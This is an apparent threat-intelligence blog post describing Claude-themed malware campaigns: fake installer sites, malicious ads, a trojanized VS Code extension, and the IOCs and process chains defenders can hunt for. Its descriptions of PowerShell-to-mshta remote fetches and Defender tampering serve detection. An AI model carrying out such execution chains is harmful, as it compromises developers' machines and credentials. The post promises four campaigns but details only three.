Claude-Themed Malware Campaigns
Attackers Are Running at Least Four Separate Claude-Themed Malware Campaigns Right Now.
A fake site at claude-pro[.]com is advertising “Claude-Pro Relay”, pitched as a high-performance relay service for Claude Code developers. The only thing on it is a download button for a 505MB archive that installs a previously undocumented Windows backdoor Sophos calls Beagle, delivered via DonutLoader, alongside a PlugX chain via DLL sideloading. That’s one campaign. Three others are running concurrently.
Campaign 1: The PlugX installer (claude-pro[.]com, active since March 2026)
The MSI installer places files at C:\Program Files (x86)\Anthropic\Claude\Cluade\ (misspelled) mimicking a legitimate Anthropic installation path. A VBScript dropper copies NOVUpdate.exe, avk.dll, and an encrypted .dat file into the Windows Startup folder and launches the executable silently. Within 22 seconds, the process connects to 8.217.190[.]58 (Alibaba Cloud) over HTTPS and begins C2 communication. The VBScript then self-deletes to reduce forensic visibility.
Campaign 2: InstallFix via Google Ads (active now)
Attackers are buying Google Ads for “Claude Code” and “Claude Code install” searches, placing sponsored results at the top. Victims land on cloned install pages instructing them to run a PowerShell one-liner that chains into mshta.exe, fetching claude.msixbundle, a ZIP/HTA polyglot hiding a malicious HTML Application payload inside what appears to be a Microsoft-signed package.
Campaign 3: Claude Fraud (active since February 2026)
A trojanized VS Code extension posing as an official Claude Code plugin executes PowerShell silently on Windows, modifying Defender and downloading payloads. On macOS, sponsored ads lead to fake Claude documentation pages delivering the MacSync infostealer via ClickFix terminal commands. The campaign deliberately targets technically sophisticated users, developers and security practitioners, exploiting the specific trust those users place in recognized domains and copy-paste terminal instructions.
Why Claude specifically
Claude’s growth to nearly 290 million web visits per month makes it an unusually attractive lure. Developers integrating AI tools have elevated permissions and routine access to credentials, CI/CD secrets, and internal systems. They’re also the users most likely to trust a curl-to-bash install command without reading it. That’s the attack surface all four campaigns are built on.
IOCs and detection
File IOCs: NOVUpdate.exe, avk.dll, NOVUpdate.exe.dat in C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\. Misspelled install path: \Cluade\. C2 IP: 8.217.190[.]58.
Process chains to hunt: Code.exe → powershell.exe → mshta.exe with a remote URL argument on developer workstations. Also monitor WScript.exe dropping executables into Startup paths, PowerShell with encoded commands, and AMSI tampering patterns.
Organizational controls: block sponsored search results for AI developer tools at DNS or browser level. Deploy Claude and developer tooling via MDM or vetted onboarding scripts rather than manual downloads. Any curl-to-bash or PowerShell one-liner install instruction gets the same scrutiny as an email attachment, no exceptions for tools the developer already trusts.
- Alex